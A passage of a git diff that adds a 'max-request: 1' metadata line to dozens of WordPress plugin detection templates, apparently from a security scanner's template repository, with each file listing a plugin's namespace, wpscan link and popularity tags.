https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- 